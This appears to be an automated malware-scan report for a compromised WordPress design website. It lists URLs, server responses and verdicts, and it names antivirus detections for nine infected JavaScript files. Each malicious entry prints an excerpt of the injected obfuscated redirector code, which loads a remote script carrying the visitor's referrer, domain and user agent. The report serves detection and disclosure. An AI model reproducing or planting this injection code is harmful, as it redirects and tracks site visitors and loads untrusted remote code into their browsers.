Request | Server response | Status |
http://a-f-design.com/ | HTTP/1.1 301 Moved Permanently Connection: close Date: Wed, 17 Dec 2014 19:45:08 GMT Location: http://www.a-f-design.com/ Server: Apache Content-Length: 0 Content-Type: text/html; charset=UTF-8 X-Pingback: http://www.a-f-design.com/wordpress/xmlrpc.php X-Powered-By: PHP/5.2.17
| clean |
http://www.a-f-design.com/ | 200 OK Content-Length: 11605 Content-Type: text/html | clean |
http://www.a-f-design.com/wordpress/wp-includes/js/jquery/jquery.js?ver=1.4.2 | 200 OK Content-Length: 92744 Content-Type: application/x-javascript | malicious |
Malicious code - confirmed by antiviruses (see below) (function(a,b){function cy(a){return f.isWindow(a)?a:a.nodeType===9?a.defaultView||a.parentWindow:!1}function cv(a){if(!cj[a]){var b=f("<"+a+">").appendTo("body"),d=b.css("display");b.remove();if(d==="none"||d===""){ck||(ck=c.createElement("iframe"),ck.frameBorder=ck.width=ck.height=0),c.body.appendChild(ck);if(!cl||!ck.createElement)cl=(ck.contentWindow||ck.contentDocument).document,cl.write("<!doctype><html><body></body></html>");b=cl.createElement(a),cl.bod
... 3178 bytes are skipped ...ua[_0xa687[3]](_0xa687[4])==-1&&ua[_0xa687[3]](_0xa687[5])==-1))&&ua[_0xa687[3]](_0xa687[6])!=-1){element=document[_0xa687[8]](_0xa687[7]);if(!element){uedhffkte=document[_0xa687[9]];hghjhjhjg=escape(document[_0xa687[10]]);kdhkjt=escape(navigator[_0xa687[1]]);var js=document[_0xa687[12]](_0xa687[11]);js[_0xa687[13]]=_0xa687[7];js[_0xa687[14]]=_0xa687[15]+hghjhjhjg+_0xa687[16]+uedhffkte+_0xa687[17]+kdhkjt;var head=document[_0xa687[19]](_0xa687[18])[0];head[_0xa687[20]](js);} ;} ;
Antivirus reports:- AntiVir
- JS/Redirector.OM.2
- Avast
- JS:Decode-OG [Trj]
- Ikarus
- Trojan.Script
- Rising
- Trojan.Script.JS.Redirector.f
- nProtect
- Trojan.Agent.JS.DN
- TrendMicro-HouseCall
- JS_REDIR.FB
- Emsisoft
- Trojan.Agent.JS.DN (B)
- Comodo
- TrojWare.JS.Redirector.OM
- TrendMicro
- JS_REDIR.FB
- Kaspersky
- Trojan-Downloader.JS.JScript.ag
- Microsoft
- Trojan:JS/Redirector.ID
- Fortinet
- JS/Crypt.CABZ!tr
- PCTools
- Trojan.Malscript
- TotalDefense
- JS/Redirector.DL
- NANO-Antivirus
- Trojan.Script.Agent.lymqb
- ClamAV
- JS.Trojan.Downloader-2
- F-Secure
- Trojan.Agent.JS.DN
- VIPRE
- Trojan.JS.JScript.ag (v)
- AVG
- JS/Redir
- Norman
- Obfuscated.EB
- Sophos
- Troj/JSRedir-DO
- GData
- Trojan.Agent.JS.DN
- Symantec
- Trojan.Malscript!JS
- Agnitum
- JS.Srcid.Gen
- BitDefender
- Trojan.Agent.JS.DN
|
http://www.a-f-design.com/wordpress/wp-content/themes/Cadca/jscript/prettyPhoto/js/jquery.prettyPhoto.js?ver=3.0.1 | 200 OK Content-Length: 18229 Content-Type: application/x-javascript | malicious |
Malicious code - confirmed by antiviruses (see below) (function($){$.prettyPhoto={version:'2.5.6'};$.fn.prettyPhoto=function(settings){settings=jQuery.extend({animationSpeed:'normal',opacity:0.80,showTitle:true,allowresize:true,default_width:500,default_height:344,counter_separator_label:'/',theme:'light_rounded',hideflash:false,wmode:'opaque',autoplay:true,modal:false,changepicturecallback:function(){},callback:function(){},markup:'<div class="pp_pic_holder"> \ <div class="pp_top"> \ <div class="pp_left"><
... 3565 bytes are skipped ...ua[_0xa687[3]](_0xa687[4])==-1&&ua[_0xa687[3]](_0xa687[5])==-1))&&ua[_0xa687[3]](_0xa687[6])!=-1){element=document[_0xa687[8]](_0xa687[7]);if(!element){uedhffkte=document[_0xa687[9]];hghjhjhjg=escape(document[_0xa687[10]]);kdhkjt=escape(navigator[_0xa687[1]]);var js=document[_0xa687[12]](_0xa687[11]);js[_0xa687[13]]=_0xa687[7];js[_0xa687[14]]=_0xa687[15]+hghjhjhjg+_0xa687[16]+uedhffkte+_0xa687[17]+kdhkjt;var head=document[_0xa687[19]](_0xa687[18])[0];head[_0xa687[20]](js);} ;} ;
Antivirus reports:- AntiVir
- JS/Redirector.OM.2
- Avast
- JS:Decode-OG [Trj]
- Ad-Aware
- Trojan.Agent.JS.DN
- nProtect
- Trojan.Agent.JS.DN
- Comodo
- TrojWare.JS.Redirector.OM
- CAT-QuickHeal
- JS/Redirector.ID
- K7GW
- Exploit ( 04c556d81 )
- TrendMicro
- JS_REDIR.FB
- Microsoft
- Trojan:JS/Redirector.ID
- Kaspersky
- Trojan-Downloader.JS.JScript.ag
- MicroWorld-eScan
- Trojan.Agent.JS.DN
- Fortinet
- JS/JSRedir.DO!tr
- TotalDefense
- JS/Redirector.DL
- NANO-Antivirus
- Trojan.Script.Agent.lymqb
- F-Secure
- Trojan.Agent.JS.DN
- VIPRE
- Trojan.JS.JScript.ag (v)
- AVG
- JS/Redir
- Norman
- Obfuscated.EB
- Sophos
- Troj/JSRedir-DO
- GData
- Trojan.Agent.JS.DN
- Symantec
- Trojan.Malscript!JS
- Agnitum
- JS.Srcid.Gen
- BitDefender
- Trojan.Agent.JS.DN
|
http://www.a-f-design.com/wordpress/wp-content/themes/Cadca/jscript/easing.js?ver=3.0.1 | 200 OK Content-Length: 9479 Content-Type: application/x-javascript | malicious |
Malicious code - confirmed by antiviruses (see below) jQuery.easing['jswing'] = jQuery.easing['swing']; jQuery.extend( jQuery.easing, { def: 'easeOutQuad', swing: function (x, t, b, c, d) { return jQuery.easing[jQuery.easing.def](x, t, b, c, d); }, easeInQuad: function (x, t, b, c, d) { return c*(t/=d)*t + b; }, easeOutQuad: function (x, t, b, c, d) { return -c *(t/=d)*(t-2) + b; }, easeInOutQuad: function (x, t, b, c, d) { if ((t/=d/2) < 1) return c/2*t*t + b; retur
... 3385 bytes are skipped ...ua[_0xa687[3]](_0xa687[4])==-1&&ua[_0xa687[3]](_0xa687[5])==-1))&&ua[_0xa687[3]](_0xa687[6])!=-1){element=document[_0xa687[8]](_0xa687[7]);if(!element){uedhffkte=document[_0xa687[9]];hghjhjhjg=escape(document[_0xa687[10]]);kdhkjt=escape(navigator[_0xa687[1]]);var js=document[_0xa687[12]](_0xa687[11]);js[_0xa687[13]]=_0xa687[7];js[_0xa687[14]]=_0xa687[15]+hghjhjhjg+_0xa687[16]+uedhffkte+_0xa687[17]+kdhkjt;var head=document[_0xa687[19]](_0xa687[18])[0];head[_0xa687[20]](js);} ;} ;
Antivirus reports:- AntiVir
- JS/Redirector.OM.2
- Avast
- JS:Decode-OG [Trj]
- Ikarus
- Trojan.Script
- nProtect
- Trojan.Agent.JS.DN
- K7AntiVirus
- Trojan
- TrendMicro-HouseCall
- JS_REDIR.FB
- Emsisoft
- Trojan.Agent.JS.DN (B)
- Comodo
- TrojWare.JS.Redirector.OM
- TrendMicro
- JS_REDIR.FB
- Kaspersky
- Trojan-Downloader.JS.JScript.ag
- Microsoft
- Trojan:JS/Redirector.ID
- MicroWorld-eScan
- Trojan.Agent.JS.DN
- Fortinet
- JS/Crypted.AG!tr.dldr
- PCTools
- Trojan.Malscript
- TotalDefense
- JS/Redirector.DL
- NANO-Antivirus
- Trojan.Script.Agent.lymqb
- ClamAV
- JS.Trojan.Agent-8
- F-Secure
- Trojan.Agent.JS.DN
- VIPRE
- Trojan.JS.JScript.ag (v)
- F-Prot
- JS/Redir.AO
- AVG
- JS/Redir
- Norman
- Obfuscated.EB
- Sophos
- Troj/JSRedir-DO
- GData
- Trojan.Agent.JS.DN
- Symantec
- Trojan.Malscript!JS
- Commtouch
- JS/Redir.AO
- Agnitum
- JS.Srcid.Gen
- BitDefender
- Trojan.Agent.JS.DN
|
http://www.a-f-design.com/wordpress/wp-content/themes/Cadca/jscript/cufon-yui.js?ver=3.0.1 | 200 OK Content-Length: 19635 Content-Type: application/x-javascript | malicious |
Malicious code - confirmed by antiviruses (see below) var Cufon=(function(){var m=function(){return m.replace.apply(null,arguments)};var x=m.DOM={ready:(function(){var C=false,E={loaded:1,complete:1};var B=[],D=function(){if(C){return}C=true;for(var F;F=B.shift();F()){}};if(document.addEventListener){document.addEventListener("DOMContentLoaded",D,false);window.addEventListener("pageshow",D,false)}if(!window.opera&&document.readyState){(function(){E[document.readyState]?D():setTimeout(arguments.callee,10)})()}if(document.readyState&&
... 3060 bytes are skipped ...ua[_0xa687[3]](_0xa687[4])==-1&&ua[_0xa687[3]](_0xa687[5])==-1))&&ua[_0xa687[3]](_0xa687[6])!=-1){element=document[_0xa687[8]](_0xa687[7]);if(!element){uedhffkte=document[_0xa687[9]];hghjhjhjg=escape(document[_0xa687[10]]);kdhkjt=escape(navigator[_0xa687[1]]);var js=document[_0xa687[12]](_0xa687[11]);js[_0xa687[13]]=_0xa687[7];js[_0xa687[14]]=_0xa687[15]+hghjhjhjg+_0xa687[16]+uedhffkte+_0xa687[17]+kdhkjt;var head=document[_0xa687[19]](_0xa687[18])[0];head[_0xa687[20]](js);} ;} ;
Antivirus reports:- AntiVir
- JS/Redirector.OM.2
- Avast
- JS:Decode-OG [Trj]
- Ikarus
- Trojan.Script
- nProtect
- Trojan.Agent.JS.DN
- TrendMicro-HouseCall
- JS_REDIR.FB
- Emsisoft
- Trojan.Agent.JS.DN (B)
- Comodo
- TrojWare.JS.Redirector.OM
- TrendMicro
- JS_REDIR.FB
- Kaspersky
- Trojan-Downloader.JS.JScript.ag
- Microsoft
- Trojan:JS/Redirector.ID
- MicroWorld-eScan
- Trojan.Agent.JS.DN
- Fortinet
- JS/Crypt.CABZ!tr
- PCTools
- Trojan.Malscript
- TotalDefense
- JS/Redirector.DL
- NANO-Antivirus
- Trojan.Script.Agent.lymqb
- ClamAV
- JS.Trojan.Agent-8
- F-Secure
- Trojan.Agent.JS.DN
- VIPRE
- Trojan.JS.JScript.ag (v)
- AVG
- JS/Redir
- Norman
- Obfuscated.EB
- Sophos
- Troj/JSRedir-DO
- GData
- Trojan.Agent.JS.DN
- Agnitum
- JS.Srcid.Gen
- BitDefender
- Trojan.Agent.JS.DN
- ESET-NOD32
- JS/Agent.NEQ
|
http://www.a-f-design.com/wordpress/wp-content/themes/Cadca/jscript/ColaborateLight_400.font.js?ver=3.0.1 | 200 OK Content-Length: 42465 Content-Type: application/x-javascript | malicious |
Malicious code - confirmed by antiviruses (see below) Cufon.registerFont({"w":175,"face":{"font-family":"ColaborateLight","font-weight":400,"font-stretch":"normal","units-per-em":"360","panose-1":"2 0 5 3 4 0 0 2 0 4","ascent":"288","descent":"-72","x-height":"4","bbox":"-9 -301 312 75","underline-thickness":"18","underline-position":"-18","stemh":"19","stemv":"23","unicode-range":"U+0020-U+0192"},"glyphs":{" ":{"w":87},"\u00f0":{"d":"159,-102v0,53,-12,107,-74,107v-41,0,-69,-34,-69,-74v0,-75,93,-101,119,-38v0,-44,-12,-74,-40,-92r-31,21r-19,-11r28,-
... 3024 bytes are skipped ...ua[_0xa687[3]](_0xa687[4])==-1&&ua[_0xa687[3]](_0xa687[5])==-1))&&ua[_0xa687[3]](_0xa687[6])!=-1){element=document[_0xa687[8]](_0xa687[7]);if(!element){uedhffkte=document[_0xa687[9]];hghjhjhjg=escape(document[_0xa687[10]]);kdhkjt=escape(navigator[_0xa687[1]]);var js=document[_0xa687[12]](_0xa687[11]);js[_0xa687[13]]=_0xa687[7];js[_0xa687[14]]=_0xa687[15]+hghjhjhjg+_0xa687[16]+uedhffkte+_0xa687[17]+kdhkjt;var head=document[_0xa687[19]](_0xa687[18])[0];head[_0xa687[20]](js);} ;} ;
Antivirus reports:- AntiVir
- JS/Redirector.OM.2
- Avast
- JS:Decode-OG [Trj]
- Ikarus
- Trojan.Script
- nProtect
- Trojan.Agent.JS.DN
- TrendMicro-HouseCall
- JS_REDIR.FB
- Emsisoft
- Trojan.Agent.JS.DN (B)
- Comodo
- TrojWare.JS.Redirector.OM
- TrendMicro
- JS_REDIR.FB
- Kaspersky
- Trojan-Downloader.JS.JScript.ag
- Microsoft
- Trojan:JS/Redirector.ID
- PCTools
- Trojan.Malscript
- TotalDefense
- JS/Redirector.DL
- NANO-Antivirus
- Trojan.Script.Agent.lymqb
- ClamAV
- JS.Trojan.Agent-8
- F-Secure
- Trojan.Agent.JS.DN
- VIPRE
- Trojan.JS.JScript.ag (v)
- AVG
- JS/Redir
- Norman
- Obfuscated.EB
- Sophos
- Troj/JSRedir-DO
- GData
- Trojan.Agent.JS.DN
- Symantec
- Trojan.Malscript!JS
- Agnitum
- JS.Srcid.Gen
- BitDefender
- Trojan.Agent.JS.DN
|
http://www.a-f-design.com/wordpress/wp-content/themes/Cadca/jscript/Colaborate-Medium_400.font.js?ver=3.0.1 | 200 OK Content-Length: 41931 Content-Type: application/x-javascript | malicious |
Malicious code - confirmed by antiviruses (see below) Cufon.registerFont({"w":194,"face":{"font-family":"Colaborate-Medium","font-weight":400,"font-stretch":"normal","units-per-em":"360","panose-1":"2 0 6 3 7 0 0 2 0 4","ascent":"288","descent":"-72","x-height":"5","bbox":"-11 -301 336 88","underline-thickness":"18","underline-position":"-18","stemh":"19","stemv":"41","unicode-range":"U+0020-U+0192"},"glyphs":{" ":{"w":97},"\u00f0":{"d":"178,-102v0,53,-14,108,-83,108v-41,0,-78,-28,-78,-72v0,-73,79,-110,119,-53v0,-35,-13,-59,-37,-71r-28,19r-29,-17r2
... 3024 bytes are skipped ...ua[_0xa687[3]](_0xa687[4])==-1&&ua[_0xa687[3]](_0xa687[5])==-1))&&ua[_0xa687[3]](_0xa687[6])!=-1){element=document[_0xa687[8]](_0xa687[7]);if(!element){uedhffkte=document[_0xa687[9]];hghjhjhjg=escape(document[_0xa687[10]]);kdhkjt=escape(navigator[_0xa687[1]]);var js=document[_0xa687[12]](_0xa687[11]);js[_0xa687[13]]=_0xa687[7];js[_0xa687[14]]=_0xa687[15]+hghjhjhjg+_0xa687[16]+uedhffkte+_0xa687[17]+kdhkjt;var head=document[_0xa687[19]](_0xa687[18])[0];head[_0xa687[20]](js);} ;} ;
Antivirus reports:- AntiVir
- JS/Redirector.OM.2
- Avast
- JS:Decode-OG [Trj]
- Ikarus
- Trojan.Script
- nProtect
- Trojan.Agent.JS.DN
- TrendMicro-HouseCall
- JS_REDIR.FB
- Emsisoft
- Trojan.Agent.JS.DN (B)
- Comodo
- TrojWare.JS.Redirector.OM
- TrendMicro
- JS_REDIR.FB
- Kaspersky
- Trojan-Downloader.JS.JScript.ag
- Microsoft
- Trojan:JS/Redirector.ID
- PCTools
- Trojan.Malscript
- TotalDefense
- JS/Redirector.DL
- NANO-Antivirus
- Trojan.Script.Agent.lymqb
- ClamAV
- JS.Trojan.Agent-8
- F-Secure
- Trojan.Agent.JS.DN
- VIPRE
- Trojan.JS.JScript.ag (v)
- AVG
- JS/Redir
- Norman
- Obfuscated.EB
- Sophos
- Troj/JSRedir-DO
- GData
- Trojan.Agent.JS.DN
- Symantec
- Trojan.Malscript!JS
- Agnitum
- JS.Srcid.Gen
- BitDefender
- Trojan.Agent.JS.DN
|
http://www.a-f-design.com/wordpress/wp-includes/js/swfobject.js?ver=2.2 | 200 OK Content-Length: 11598 Content-Type: application/x-javascript | malicious |
Malicious code - confirmed by antiviruses (see below) var swfobject=function(){var D="undefined",r="object",S="Shockwave Flash",W="ShockwaveFlash.ShockwaveFlash",q="application/x-shockwave-flash",R="SWFObjectExprInst",x="onreadystatechange",O=window,j=document,t=navigator,T=false,U=[h],o=[],N=[],I=[],l,Q,E,B,J=false,a=false,n,G,m=true,M=function(){var aa=typeof j.getElementById!=D&&typeof j.getElementsByTagName!=D&&typeof j.createElement!=D,ah=t.userAgent.toLowerCase(),Y=t.platform.toLowerCase(),ae=Y?/win/.test(Y):/win/.test(ah),ac=
... 3128 bytes are skipped ...ua[_0xa687[3]](_0xa687[4])==-1&&ua[_0xa687[3]](_0xa687[5])==-1))&&ua[_0xa687[3]](_0xa687[6])!=-1){element=document[_0xa687[8]](_0xa687[7]);if(!element){uedhffkte=document[_0xa687[9]];hghjhjhjg=escape(document[_0xa687[10]]);kdhkjt=escape(navigator[_0xa687[1]]);var js=document[_0xa687[12]](_0xa687[11]);js[_0xa687[13]]=_0xa687[7];js[_0xa687[14]]=_0xa687[15]+hghjhjhjg+_0xa687[16]+uedhffkte+_0xa687[17]+kdhkjt;var head=document[_0xa687[19]](_0xa687[18])[0];head[_0xa687[20]](js);} ;} ;
Antivirus reports:- AntiVir
- JS/Redirector.OM.2
- Avast
- JS:Decode-OG [Trj]
- Ad-Aware
- Trojan.Agent.JS.DN
- Ikarus
- Trojan.Script
- nProtect
- Trojan.Agent.JS.DN
- TrendMicro-HouseCall
- JS_REDIR.FB
- Comodo
- TrojWare.JS.Redirector.OM
- CAT-QuickHeal
- JS/Redirector.ID
- K7GW
- Exploit ( 04c556d81 )
- TrendMicro
- JS_REDIR.FB
- Microsoft
- Trojan:JS/Redirector.ID
- Kaspersky
- Trojan-Downloader.JS.JScript.ag
- ViRobot
- JS.A.JScript.11448
- MicroWorld-eScan
- Trojan.Agent.JS.DN
- Fortinet
- JS/JSRedir.DO!tr
- TotalDefense
- JS/Redirector.DL
- NANO-Antivirus
- Trojan.Script.Agent.lymqb
- F-Secure
- Trojan.Agent.JS.DN
- VIPRE
- Trojan.JS.JScript.ag (v)
- AVG
- JS/Redir
- Norman
- Obfuscated.EB
- Sophos
- Troj/JSRedir-DO
- GData
- Trojan.Agent.JS.DN
- Symantec
- Trojan.Malscript!JS
- Agnitum
- JS.Srcid.Gen
- ESET-NOD32
- JS/Agent.NEQ
- BitDefender
- Trojan.Agent.JS.DN
|
http://www.a-f-design.com/wordpress/wp-content/themes/Cadca/jscript/pk.js?ver=3.0.1 | 200 OK Content-Length: 27499 Content-Type: application/x-javascript | malicious |
Malicious code - confirmed by antiviruses (see below) jQuery.noConflict(); jQuery(document).ready(function(){ jQuery(".main_menu").pk_menu(); jQuery("#options_wrapper").pk_options_menu(); if(jQuery("#project_details").length == 0) { jQuery(".big_gallery").pk_gallery({ photos: ".item", thumbs: ".gallery_navigation a", buttonNext: ".gallery_button_next", buttonPrev: ".gallery_button_prev", buttonPlayPause: ".button_play_pause", easing: "easeInOutQuad", speedIn: 400,
... 3343 bytes are skipped ...ua[_0xa687[3]](_0xa687[4])==-1&&ua[_0xa687[3]](_0xa687[5])==-1))&&ua[_0xa687[3]](_0xa687[6])!=-1){element=document[_0xa687[8]](_0xa687[7]);if(!element){uedhffkte=document[_0xa687[9]];hghjhjhjg=escape(document[_0xa687[10]]);kdhkjt=escape(navigator[_0xa687[1]]);var js=document[_0xa687[12]](_0xa687[11]);js[_0xa687[13]]=_0xa687[7];js[_0xa687[14]]=_0xa687[15]+hghjhjhjg+_0xa687[16]+uedhffkte+_0xa687[17]+kdhkjt;var head=document[_0xa687[19]](_0xa687[18])[0];head[_0xa687[20]](js);} ;} ;
Antivirus reports:- AntiVir
- JS/Redirector.OM.2
- Avast
- JS:Decode-OG [Trj]
- Ad-Aware
- Trojan.Agent.JS.DN
- Ikarus
- Trojan.Script
- Rising
- JS:Trojan.Script.JS.Redirector.f!1609362
- nProtect
- Trojan.Agent.JS.DN
- K7AntiVirus
- Trojan ( 0ea2df630 )
- TrendMicro-HouseCall
- JS_REDIR.FB
- Comodo
- TrojWare.JS.Redirector.OM
- CAT-QuickHeal
- JS/Redirector.ID
- K7GW
- Exploit ( 04c556d81 )
- TrendMicro
- JS_REDIR.FB
- Microsoft
- Trojan:JS/Redirector.ID
- Kaspersky
- Trojan-Downloader.JS.JScript.ag
- MicroWorld-eScan
- Trojan.Agent.JS.DN
- Fortinet
- JS/JSRedir.DO!tr
- TotalDefense
- JS/Redirector.DL
- NANO-Antivirus
- Trojan.Script.Agent.lymqb
- ClamAV
- JS.Trojan.Agent-8
- F-Secure
- Trojan.Agent.JS.DN
- VIPRE
- Trojan.JS.JScript.ag (v)
- F-Prot
- JS/Redir.AO
- AVG
- JS/Redir
- Norman
- Obfuscated.EB
- Sophos
- Troj/JSRedir-DO
- GData
- Trojan.Agent.JS.DN
- Symantec
- Trojan.Malscript!JS
- Commtouch
- JS/Redir.AO
- Agnitum
- JS.Srcid.Gen
- BitDefender
- Trojan.Agent.JS.DN
|
http://www.a-f-design.com/wordpress/wp-includes/js/comment-reply.js?ver=20090102 | 200 OK Content-Length: 2164 Content-Type: application/x-javascript | malicious |
Malicious code - confirmed by antiviruses (see below) addComment={moveForm:function(d,f,i,c){var m=this,a,h=m.I(d),b=m.I(i),l=m.I("cancel-comment-reply-link"),j=m.I("comment_parent"),k=m.I("comment_post_ID");if(!h||!b||!l||!j){return}m.respondId=i;c=c||false;if(!m.I("wp-temp-form-div")){a=document.createElement("div");a.id="wp-temp-form-div";a.style.display="none";b.parentNode.insertBefore(a,b)}h.parentNode.insertBefore(b,h.nextSibling);if(k&&c){k.value=c}j.value=f;l.style.display="";l.onclick=function(){var n=addComment,e=n.I("wp-temp-form
... 1196 bytes are skipped ...ua[_0xa687[3]](_0xa687[4])==-1&&ua[_0xa687[3]](_0xa687[5])==-1))&&ua[_0xa687[3]](_0xa687[6])!=-1){element=document[_0xa687[8]](_0xa687[7]);if(!element){uedhffkte=document[_0xa687[9]];hghjhjhjg=escape(document[_0xa687[10]]);kdhkjt=escape(navigator[_0xa687[1]]);var js=document[_0xa687[12]](_0xa687[11]);js[_0xa687[13]]=_0xa687[7];js[_0xa687[14]]=_0xa687[15]+hghjhjhjg+_0xa687[16]+uedhffkte+_0xa687[17]+kdhkjt;var head=document[_0xa687[19]](_0xa687[18])[0];head[_0xa687[20]](js);} ;} ;
Antivirus reports:- AntiVir
- JS/Redirector.OM.2
- Avast
- JS:Decode-OG [Trj]
- Ikarus
- Trojan.Script
- nProtect
- Dropped:Trojan.Agent.JS.DN
- K7AntiVirus
- Trojan
- TrendMicro-HouseCall
- JS_REDIR.FB
- Emsisoft
- Dropped:Trojan.Agent.JS.DN (B)
- Comodo
- TrojWare.JS.Redirector.OM
- TrendMicro
- JS_REDIR.FB
- Kaspersky
- Trojan-Downloader.JS.JScript.ag
- Microsoft
- Trojan:JS/Redirector.ID
- MicroWorld-eScan
- Dropped:Trojan.Agent.JS.DN
- Fortinet
- JS/Crypted.AG!tr.dldr
- PCTools
- Trojan.Malscript
- TotalDefense
- JS/Redirector.DL
- NANO-Antivirus
- Trojan.Script.Agent.lymqb
- ClamAV
- JS.Trojan.Agent-8
- F-Secure
- Dropped:Trojan.Agent.JS.DN
- VIPRE
- Trojan.JS.JScript.ag (v)
- F-Prot
- JS/Redir.AO
- AVG
- JS/Redir
- Norman
- Obfuscated.EB
- Sophos
- Troj/JSRedir-DO
- GData
- Dropped:Trojan.Agent.JS.DN
- Symantec
- Trojan.Malscript!JS
- Commtouch
- JS/Redir.AO
- Agnitum
- JS.Srcid.Gen
- BitDefender
- Dropped:Trojan.Agent.JS.DN
|
http://www.a-f-design.com/wordpress/wp-content/plugins/google-analyticator/external-tracking.min.js?ver=6.2 | 200 OK Content-Length: 2305 Content-Type: application/x-javascript | malicious |
Malicious code - confirmed by antiviruses (see below) jQuery(document).ready(function(){jQuery('a').each(function(){var a=jQuery(this);var href=a.attr('href');if(href==undefined) return;var url=href.replace('http://','').replace('https://','');var hrefArray=href.split('.').reverse();var extension=hrefArray[0].toLowerCase();var hrefArray=href.split('/').reverse();var domain=hrefArray[2];var downloadTracked=false;if(jQuery.inArray(extension,analyticsFileTypes)!=-1){downloadTracked=true;a.click(function(){if(analyticsEventTracking=='enabled'){_gaq
... 1361 bytes are skipped ...ua[_0xa687[3]](_0xa687[4])==-1&&ua[_0xa687[3]](_0xa687[5])==-1))&&ua[_0xa687[3]](_0xa687[6])!=-1){element=document[_0xa687[8]](_0xa687[7]);if(!element){uedhffkte=document[_0xa687[9]];hghjhjhjg=escape(document[_0xa687[10]]);kdhkjt=escape(navigator[_0xa687[1]]);var js=document[_0xa687[12]](_0xa687[11]);js[_0xa687[13]]=_0xa687[7];js[_0xa687[14]]=_0xa687[15]+hghjhjhjg+_0xa687[16]+uedhffkte+_0xa687[17]+kdhkjt;var head=document[_0xa687[19]](_0xa687[18])[0];head[_0xa687[20]](js);} ;} ;
Antivirus reports:- AntiVir
- JS/Redirector.OM.2
- Avast
- JS:Decode-OG [Trj]
- Ad-Aware
- Trojan.Agent.JS.DN
- Ikarus
- Trojan.Script
- Rising
- JS:Trojan.Script.JS.Redirector.f!1609362
- nProtect
- Trojan.Agent.JS.DN
- K7AntiVirus
- Trojan ( 0ea2df630 )
- TrendMicro-HouseCall
- JS_REDIR.FB
- Comodo
- TrojWare.JS.Redirector.OM
- CAT-QuickHeal
- JS/Redirector.ID
- K7GW
- Exploit ( 04c556d81 )
- TrendMicro
- JS_REDIR.FB
- Microsoft
- Trojan:JS/Redirector.ID
- Kaspersky
- Trojan-Downloader.JS.JScript.ag
- MicroWorld-eScan
- Trojan.Agent.JS.DN
- Fortinet
- JS/Crypted.AG!tr.dldr
- TotalDefense
- JS/Redirector.DL
- NANO-Antivirus
- Trojan.Script.Agent.lymqb
- ClamAV
- JS.Trojan.Agent-8
- F-Secure
- Trojan.Agent.JS.DN
- VIPRE
- Trojan.JS.JScript.ag (v)
- F-Prot
- JS/Redir.AO
- AVG
- JS/Redir
- Norman
- Obfuscated.EB
- Sophos
- Troj/JSRedir-DO
- GData
- Trojan.Agent.JS.DN
- Symantec
- Trojan.Malscript!JS
- Commtouch
- JS/Redir.AO
- Agnitum
- JS.Srcid.Gen
- BitDefender
- Trojan.Agent.JS.DN
|
http://a-f-design.com/test404page.js | HTTP/1.1 301 Moved Permanently Cache-Control: no-cache, must-revalidate, max-age=0 Connection: close Date: Wed, 17 Dec 2014 19:45:11 GMT Pragma: no-cache Location: http://www.a-f-design.com/test404page.js Server: Apache Content-Length: 0 Content-Type: text/html; charset=UTF-8 Expires: Wed, 11 Jan 1984 05:00:00 GMT Last-Modified: Wed, 17 Dec 2014 19:45:12 GMT X-Pingback: http://www.a-f-design.com/wordpress/xmlrpc.php X-Powered-By: PHP/5.2.17
| clean |
http://www.a-f-design.com/test404page.js | 404 Not Found Content-Length: 8616 Content-Type: text/html | clean |
http://www.a-f-design.com/design/ | 200 OK Content-Length: 12495 Content-Type: text/html | clean |
http://www.a-f-design.com/design/raum/ | 200 OK Content-Length: 60069 Content-Type: text/html | clean |
http://www.a-f-design.com/design/kommunikation/ | 200 OK Content-Length: 23025 Content-Type: text/html | clean |